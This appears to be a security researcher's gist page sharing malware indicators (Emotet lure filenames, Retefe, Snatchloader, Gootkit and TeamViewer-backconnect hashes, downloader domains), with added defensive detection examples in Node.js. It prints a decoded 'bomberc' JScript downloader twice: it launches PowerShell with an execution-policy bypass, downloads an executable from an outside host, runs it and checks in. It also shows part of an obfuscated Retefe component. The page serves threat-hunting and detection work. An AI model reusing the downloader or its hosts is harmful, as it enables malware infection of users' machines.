Blevene (PANW)
@Blevene
Blevene / Filenames
Created Nov 28, 2017
Emotet DE Targets: 11/28/2017
File: Filenames
Informationen # 558760280928.doc
Informationen # 8104038723.doc
Invoice #38608290.doc
Invoice #639002322639.doc
Rechnung # 3310283.doc
Rechnung # 640507209.doc
Rechnung # 72120749699.doc
Rechnung # 953444866.doc
Rechnungs-Details # 4168802.doc
Rechnungs-Details # 54430860.doc
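Added example, not part of the gist: a check for the lure-name pattern the list above shows (a German or English billing noun, an optional space, '#', an optional space, a long numeric ID, a .doc extension), plus a templating step that collapses the varying number so names from a mail gateway or EDR file-create feed can be clustered for hunting. The noun list and the 6-to-12 digit range are assumptions read off the ten listed names; BENIGN_NAMES are constructed, not observed. Runs offline with Node.js.

```javascript
// Added example (not from the gist): lure-name check and templating for the
// Emotet DE filenames listed above. Nouns and digit range are assumptions
// derived from the ten listed names.
const LURE_NOUNS = ['Rechnung', 'Rechnungs-Details', 'Informationen', 'Invoice'];
const LURE_NAME = new RegExp('^(?:' + LURE_NOUNS.join('|') + ')\\s?#\\s?\\d{6,12}\\.doc$');

// True when a filename matches the "<noun> # <digits>.doc" lure shape.
function isEmotetLureName(name) {
  return LURE_NAME.test(name);
}

// Replace every run of digits with <N> so "Rechnung # 3310283.doc" and
// "Rechnung # 640507209.doc" fall into the same bucket.
function lureTemplate(name) {
  return name.replace(/\d+/g, '<N>');
}

// Count matching names per template; non-matching names are ignored.
function clusterByTemplate(names) {
  const counts = {};
  for (const n of names) {
    if (!isEmotetLureName(n)) continue;
    const t = lureTemplate(n);
    counts[t] = (counts[t] || 0) + 1;
  }
  return counts;
}

// The ten names from the gist, used as sample input.
const LISTED_NAMES = [
  'Informationen # 558760280928.doc',
  'Informationen # 8104038723.doc',
  'Invoice #38608290.doc',
  'Invoice #639002322639.doc',
  'Rechnung # 3310283.doc',
  'Rechnung # 640507209.doc',
  'Rechnung # 72120749699.doc',
  'Rechnung # 953444866.doc',
  'Rechnungs-Details # 4168802.doc',
  'Rechnungs-Details # 54430860.doc',
];

// Constructed benign names that a naive "Rechnung" or "Invoice" match would flag.
const BENIGN_NAMES = [
  'Rechnung 2017-11.docx',
  'Invoice #38608290.pdf',
  'Informationen # ABC.doc',
  'Meeting notes.doc',
];

console.log(clusterByTemplate(LISTED_NAMES.concat(BENIGN_NAMES)));
```

The template counts are what you would pivot on: a sudden spike of one template across many recipients is the campaign signal, while the raw numeric IDs are unique per message and useless as indicators.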
@Blevene
Blevene / Retefe Components
Created Nov 29, 2017
Retefe - e2494fc7eda73ac116a9a07aced0bab23efc6d494dd3f024e45f048b339f7860
File: Retefe Components
//JS Component
(function(e, r) {
"object" == typeof exports ? module.exports = r() : "function" == typeof define && define.amd ? define(r) : e.RYULJ = r()
})(this, function() {
"use strict";
var e = 14,
r = 8,
n = !1,
f = function(e) {
try {
File: Retefe_Hashes_And_HTTP_URIs
host,method,url,user_agent,sha256,
pamplonarecados.com,GET,/pbuxegx.exe,,c9390e9f53c2a05c3cf7b84c1ee80acb8306be64b5e5e5544913ac298a1aa5db,
pamplonarecados.com,GET,/pbuxegx.exe,,05f298006d2bf23b3ebe8bf0e4bf1431602d96f5170efa0e0d983cac0d7f42b6,
pamplonarecados.com,GET,/pbuxegx.exe,,dbcdbe148ba66056fed2349138b849643cb35fd9c8424febfbc473d22418ccf2,
pamplonarecados.com,GET,/pbuxegx.exe,,648bef8d6abd544c17fcc1275a6f84686296ee9001b55bf64a3dc8971cf0f3f9,
pamplonarecados.com,GET,/pbuxegx.exe,,2ab4550f7793e53682499e852f1c043f70eaac909c30ced4d6263bb193db0ddb,
pamplonarecados.com,GET,/pbuxegx.exe,,405ec5019db005dfc205e6bab8820d43073694943396305e923f62afde0197b7,
pamplonarecados.com,GET,/pbuxegx.exe,,f19f50619761c2f712ad26c870eefd62e1a9b054d856909c8b12d04eaf7ec939,
pamplonarecados.com,GET,/pbuxegx.exe,,1125356ffdc01a4964e1504d034b3bbdb6df75fb3848fe2c72e579a7c9458743,
pamplonarecados.com,GET,/pbuxegx.exe,,93a4881c4a3c76e2afbd43b08a7a086bb03ccab717cb82e2ef9a09447624c3b2,
File: gist:e601eaa3dc05c4d12b53eaf7b96aeba5
Filename: request.doc
Sha256
84a7ddaad12698d9b5b2f0eef0f17f42b762dac78b77a86a994a66be2f1f1ef5
9d1b9f99302ab34a0b468b52317d208dfc9d91e10ecb1d079d00c3367a9666ce
503b3ba8ae3464e6735d305f5a5fc82479fe5b961d348800d100ec911f90b208
a05c5dd59204fb505c2b4b2911d9cec4bd00337d41caec19dccdeffb58c3d756
c191965ee51c04073d47e4c5b349bf69cf33c083cc641b9f92b293ae9ae2628d
6e6ffedeb7b0e7de8a3e85ed00e8f84e61356935b1b637b4711ae691ce496490
b891b48ad2e98dbb409e4d1f95a40b30635ae528fa7076a5cb76beacaf78da05
File: Snatchloader Hashes
d38945a93a926169cbe878afa6b292a5b52c570b61dc096725a0ddb8fdd5209e
0b718516dcd50a092663c9cd6f7774408cdaaf2bf55cddf1be7a69ff83b50228
847e9993ee3dbfd6a1eadb5addf82169ec8a2c8ee45fd4811950fb5a4be849db
b9cde665debef868eb0d8dcb156e57233e0d93bfab3380ed6c9564023ff9c3c5
e2e8dc489df96d8619936c9c7ad366d7639cc9e4229e11cf1804ff8aeffa8d2f
11602f3e29f3ec67e292fb84091e512ade674f5f6b71c970f70145ad16127ffa
fe93335975f3fe88e221e68e89cfb60a1e59b6b9cbde919a8b4676dd12db2934
@Blevene
Blevene / Hashes
Created Dec 14, 2017
".styx" hunt for Demonslay335
File: Hashes
5e7d11d6bd11b09c4cc0c4ba54ebea19dcc06ae585d0508d3d8dba251075f4c6
bf01d97d76a6bb8f3cfbf4a697403f4b686d43fabb429a7bf9427aa70371df78
ba9b26cc08591655878f90c3d8c9e346680e80a40a076efa886d18926eae2293
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc
488a8bc75fd39460bf54dcf904c90d67c94fa1bd38b0ee729b527a062f6ddf0e
@Blevene
Blevene / gist:ffc1bee1dd203e3d334f829a41bf05ac
Created Dec 19, 2017
Possible signed TeamViewer Backconnect... thing
File: gist:ffc1bee1dd203e3d334f829a41bf05ac
Ref (thanks Matt Mesa): https://vms.drweb.com/virus/?_is=1&i=8161714
7dc273a5328ec74392513bd7cc2849d1dc2bd5c83ff035612503aceb5a12ca72
9f5566b23d96b422921dec14952e64e583789757d7f93c7d453b2f5c5508dc2d
4ee7e9cc367d4cf8bcb568ab14d46a35bbf433b29d8686ee977692ab98bf8a72
48aab1c29b6113cf3cd1544188eccade9ae82e330bfc8803876fe64339425b3a
f2814dc63fc8b79e97046781e3e9efb4b653478802ab91ca45c4f6dd25728c66
06a0029bb4a706f03d1626ad79d919f32cf0529e83aa1d9d24d9a4639ec61d49
3278637ee693d3c9eefb6bc0b62b567f9f5f01a305ca3567d51f5f129a2e4e94
8159394c0ed15bc30b6da648dab3c3dcc5f9a62c830b4e2e98c9d29493b569a9
fa0e3c6c4da0ecc370918999a001276113773fafd0486b65b6a07175b00f2105
@Blevene
Blevene / Retefe Dropper
Created Jan 8, 2018
Retefe Campaign January 8th, 2018
File: Retefe Dropper
Binary:
25a923f213098d4878858d4dea40a01262fff3029d5ac24d0f5b064b8999a853
Downloader Locations (From Powershell):
ahkorea.eu
compters.net
concretebirdbathmolds.net
concretemoldcompanies.com
eubieartmedia.com
@Blevene
Blevene / bomberc
Created Mar 2, 2018
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
File: bomberc
<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
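Added example, not code from the gist or its author: a static IoC extractor for the decoded bomberc-style JScript downloader shown above, plus a host-side check for the process chain it produces (a Windows Script Host parent spawning powershell.exe with an execution-policy bypass and a WebClient download). The dropper text is treated purely as data and nothing in it is evaluated; the trailing `.replace(//g,'')` in the decoded script is not valid JavaScript as shown (`//` opens a comment), which does not matter to a regex-based extractor. The Sysmon-like event field names (ParentImage, Image, CommandLine) and the two sample events are assumptions, constructed for the example and not real telemetry. Runs offline with Node.js.

```javascript
// Added example (not code from the gist or its author): static IoC extraction
// from the decoded bomberc-style JScript downloader, plus a host-side check
// for the process chain it produces. The dropper text is treated purely as
// data; nothing in it is evaluated. Runs offline with Node.js.

// The decoded script from the gist, re-embedded verbatim as sample input
// (String.raw keeps its backslashes and quotes exactly as shown).
const SAMPLE_DROPPER = String.raw`<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>`;

// The "p o w e r s h e l l" trick: a spaced-out literal whose spaces are
// removed at run time by .replace(/ /g,'') so the word never appears in the
// source. Only this one construct is emulated, not arbitrary JavaScript.
function resolveSpacedLiteral(src) {
  const m = /decodeURIComponent\("([^"]*)"\)\)?\.replace\(\/ \/g,\s*''\)/.exec(src);
  return m ? decodeURIComponent(m[1]).replace(/ /g, '') : null;
}

// Pull the network, file and behavioural indicators out of the script text.
function extractIocs(src) {
  const urls = [...new Set(src.match(/https?:\/\/[^\s'"\\)]+/g) || [])];
  const drop = /\$env:APPDATA\s*\+\s*\\'\\+([A-Za-z0-9_.-]+)\\'/.exec(src);
  const close = /window\.close\(\)\s*\}\s*,\s*(\d+)\s*\)/.exec(src);
  return {
    interpreter: resolveSpacedLiteral(src),
    // -Exec Bypass / -ExecutionPolicy Bypass: script execution policy disabled
    execPolicyBypass: /-Exec(?:utionPolicy)?\s+Bypass/i.test(src),
    // WScript.Shell.Run(cmd, 0): window style 0 hides the console window
    hiddenWindow: /\.run\([^,()]+,\s*0\s*\)/.test(src),
    urls,
    hosts: [...new Set(urls.map((u) => new URL(u).hostname))],
    dropPath: drop ? '%APPDATA%\\' + drop[1] : null,
    // the lure closes its own window after this many milliseconds
    selfCloseMs: close ? Number(close[1]) : null,
  };
}

// Host-side detection of the chain: a Windows Script Host (or mshta) parent
// spawning powershell.exe with an execution-policy bypass and a download
// primitive on the command line. Field names follow a Sysmon-like
// process-creation event (an assumption); events below are constructed.
function isScriptHostToPowershellDownload(ev) {
  const parent = (ev.ParentImage || '').toLowerCase();
  const image = (ev.Image || '').toLowerCase();
  const cmd = ev.CommandLine || '';
  return /\\(wscript|cscript|mshta)\.exe$/.test(parent)
    && /\\powershell\.exe$/.test(image)
    && /-Exec(?:utionPolicy)?\s+Bypass/i.test(cmd)
    && /DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer/i.test(cmd);
}

// Constructed sample events: one matching the dropper's chain, one benign.
const SAMPLE_EVENTS = [
  { ParentImage: 'C:\\Windows\\System32\\wscript.exe',
    Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(...)' },
  { ParentImage: 'C:\\Windows\\explorer.exe',
    Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell -NoProfile -File C:\\scripts\\backup.ps1' },
];

console.log(JSON.stringify(extractIocs(SAMPLE_DROPPER), null, 2));
console.log(SAMPLE_EVENTS.map(isScriptHostToPowershellDownload)); // [ true, false ]
```

The extractor deliberately emulates only the one string-building trick the sample uses rather than running the script in a JavaScript engine; for heavier obfuscation, run the sample in an instrumented sandbox and capture the command line actually passed to WScript.Shell.Run instead of extending the regexes.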
@Blevene
Blevene / Gootkit
Created Mar 13, 2018
Gootkit: 3/13/2018
File: Gootkit
e4ec1c45173db4a6c9a243c859f21b5a72b43bcdd455e18928292e2682275399
6e5c55c8b6601081fa6fbc4e4cb64b9dba0fdcf2b432c104dfdb7157dd5a7133
d7d4e15c42f830f6e6894dd2fb4ebc8f8df65f492048e67ad7bda1949271fad1
217201028cfad66ea193105e7a7d6bb0a0d9b536d8cf6093bc45c7c328d63ac7